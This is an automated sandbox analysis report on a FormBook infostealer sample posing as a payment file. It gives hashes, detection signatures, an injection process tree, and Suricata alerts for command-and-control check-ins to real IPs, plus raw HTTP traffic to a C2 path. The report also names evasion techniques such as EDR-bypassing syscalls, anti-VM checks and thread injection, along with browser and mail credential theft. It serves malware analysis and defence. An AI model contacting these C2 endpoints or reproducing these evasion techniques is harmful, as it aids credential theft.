Edit tour

Windows Analysis Report
NF_Payment_Ref_FAN930276.exe

Overview

General Information

Sample name:	NF_Payment_Ref_FAN930276.exe
Analysis ID:	1546519
MD5:	7c86cd8c446e881a00e02c3c9cb629a7
SHA1:	6f52b3667ce3c56576b80a9748ff283dd7bffecc
SHA256:	0bc8eae9fe2dc6af83e1b798f9a6b5ef27117c5b8462664a944fca34a4e1e464
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Creation with Colorcpl

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

NF_Payment_Ref_FAN930276.exe (PID: 4712 cmdline: "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe" MD5: 7C86CD8C446E881A00E02C3C9CB629A7)

NF_Payment_Ref_FAN930276.exe (PID: 1352 cmdline: "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe" MD5: 7C86CD8C446E881A00E02C3C9CB629A7)

NF_Payment_Ref_FAN930276.exe (PID: 1520 cmdline: "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe" MD5: 7C86CD8C446E881A00E02C3C9CB629A7)

xIrbjTuvDXL.exe (PID: 1268 cmdline: "C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

colorcpl.exe (PID: 7104 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

xIrbjTuvDXL.exe (PID: 6612 cmdline: "C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6592 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4487793740.00000000050A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2290607286.0000000004E20000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4486891698.0000000003770000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2266187962.0000000001E20000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: NF_Payment_Ref_FAN930276.exe PID: 4712	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.NF_Payment_Ref_FAN930276.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.NF_Payment_Ref_FAN930276.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Creation with Colorcpl

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7104, TargetFilename: C:\Users\user

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T03:45:18.153762+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.5	49709	TCP
2024-11-01T03:45:56.666032+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.5	49901	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T03:45:36.776192+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49791	3.33.130.190	80	TCP
2024-11-01T03:46:00.485826+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49927	141.193.213.10	80	TCP
2024-11-01T03:46:14.199539+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49989	8.210.3.99	80	TCP
2024-11-01T03:46:27.801524+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49993	162.0.215.244	80	TCP
2024-11-01T03:46:41.260366+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49997	162.0.231.203	80	TCP
2024-11-01T03:46:55.480773+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50001	103.71.154.12	80	TCP
2024-11-01T03:47:08.941143+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50005	3.33.130.190	80	TCP
2024-11-01T03:47:22.457127+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50009	3.33.130.190	80	TCP
2024-11-01T03:47:35.825066+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50013	199.59.243.227	80	TCP
2024-11-01T03:47:49.208347+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50017	13.248.169.48	80	TCP
2024-11-01T03:48:03.206943+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50021	38.88.82.56	80	TCP
2024-11-01T03:48:16.588599+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50025	3.33.130.190	80	TCP
2024-11-01T03:48:30.137036+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50029	178.79.184.196	80	TCP
2024-11-01T03:48:51.879696+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50033	188.114.96.3	80	TCP
2024-11-01T03:49:08.027742+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50037	103.191.208.137	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T03:45:52.815640+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49881	141.193.213.10	80	TCP
2024-11-01T03:45:55.384550+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49896	141.193.213.10	80	TCP
2024-11-01T03:45:57.930617+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49912	141.193.213.10	80	TCP
2024-11-01T03:46:06.527656+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49959	8.210.3.99	80	TCP
2024-11-01T03:46:09.074545+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49975	8.210.3.99	80	TCP
2024-11-01T03:46:11.637053+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49988	8.210.3.99	80	TCP
2024-11-01T03:46:20.178900+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49990	162.0.215.244	80	TCP
2024-11-01T03:46:22.713312+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49991	162.0.215.244	80	TCP
2024-11-01T03:46:25.247897+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49992	162.0.215.244	80	TCP
2024-11-01T03:46:33.645276+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49994	162.0.231.203	80	TCP
2024-11-01T03:46:36.183248+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49995	162.0.231.203	80	TCP
2024-11-01T03:46:38.696337+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49996	162.0.231.203	80	TCP
2024-11-01T03:46:47.294067+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49998	103.71.154.12	80	TCP
2024-11-01T03:46:50.375712+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49999	103.71.154.12	80	TCP
2024-11-01T03:46:52.904179+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50000	103.71.154.12	80	TCP
2024-11-01T03:47:01.298157+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50002	3.33.130.190	80	TCP
2024-11-01T03:47:03.840243+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50003	3.33.130.190	80	TCP
2024-11-01T03:47:06.374480+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50004	3.33.130.190	80	TCP
2024-11-01T03:47:15.496533+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50006	3.33.130.190	80	TCP
2024-11-01T03:47:17.162260+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50007	3.33.130.190	80	TCP
2024-11-01T03:47:19.688882+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50008	3.33.130.190	80	TCP
2024-11-01T03:47:28.199080+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50010	199.59.243.227	80	TCP
2024-11-01T03:47:30.746588+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50011	199.59.243.227	80	TCP
2024-11-01T03:47:33.312596+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50012	199.59.243.227	80	TCP
2024-11-01T03:47:41.591618+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50014	13.248.169.48	80	TCP
2024-11-01T03:47:44.099404+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50015	13.248.169.48	80	TCP
2024-11-01T03:47:46.622150+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50016	13.248.169.48	80	TCP
2024-11-01T03:47:55.556278+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50018	38.88.82.56	80	TCP
2024-11-01T03:47:58.080888+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50019	38.88.82.56	80	TCP
2024-11-01T03:48:00.652282+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50020	38.88.82.56	80	TCP
2024-11-01T03:48:08.920254+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50022	3.33.130.190	80	TCP
2024-11-01T03:48:11.486250+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50023	3.33.130.190	80	TCP
2024-11-01T03:48:14.044588+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50024	3.33.130.190	80	TCP
2024-11-01T03:48:22.480786+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50026	178.79.184.196	80	TCP
2024-11-01T03:48:25.699766+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50027	178.79.184.196	80	TCP
2024-11-01T03:48:27.646265+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50028	178.79.184.196	80	TCP
2024-11-01T03:48:44.206759+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50030	188.114.96.3	80	TCP
2024-11-01T03:48:46.746198+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50031	188.114.96.3	80	TCP
2024-11-01T03:48:49.309149+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50032	188.114.96.3	80	TCP
2024-11-01T03:48:59.199686+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50034	103.191.208.137	80	TCP
2024-11-01T03:49:01.748539+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50035	103.191.208.137	80	TCP
2024-11-01T03:49:04.496536+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50036	103.191.208.137	80	TCP

HTTP traffic detected: POST /9g6s/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: no-cacheConnection: closeHost: www.meanttobebroken.orgOrigin: http://www.meanttobebroken.orgReferer: http://www.meanttobebroken.org/9g6s/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2Data Raw: 6e 6c 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 38 78 61 56 58 70 54 4d 32 43 77 6b 59 4c 68 72 58 76 6f 55 4f 45 7a 71 65 42 4c 34 4e 36 4f 68 36 67 4c 65 6b 77 71 61 46 4b 41 66 59 67 70 36 38 47 72 75 39 64 73 63 7a 79 58 4f 55 36 35 70 6c 6a 55 69 76 67 4b 4d 6f 34 73 51 6f 39 2f 4d 39 32 36 5a 73 42 71 32 4a 78 67 65 50 43 6e 49 4b 43 71 63 44 4e 35 6b 70 4e 6d 6a 4b 37 30 63 48 4c 46 63 32 61 65 72 2f 48 43 31 4d 4a 75 61 42 52 51 37 34 58 70 39 55 45 4f 68 37 4e 59 37 4e 36 57 62 58 6d 74 73 76 65 4e 39 54 46 6a 53 46 7a 41 57 2f 6b 44 4f 34 37 4a 4e 47 6b 5a 4e 34 51 2b 75 72 67 76 4d 36 45 3d Data Ascii: nl=o9/euJtDoA2P38xaVXpTM2CwkYLhrXvoUOEzqeBL4N6Oh6gLekwqaFKAfYgp68Gru9dsczyXOU65pljUivgKMo4sQo9/M926ZsBq2JxgePCnIKCqcDN5kpNmjK70cHLFc2aer/HC1MJuaBRQ74Xp9UEOh7NY7N6WbXmtsveN9TFjSFzAW/kDO47JNGkZN4Q+urgvM6E=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:45:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8db88d1c1d203168-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:45:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8db88d2c1b422d3e-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 02:45:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8db88d3c1b2e2cd5-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 01 Nov 2024 02:46:20 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 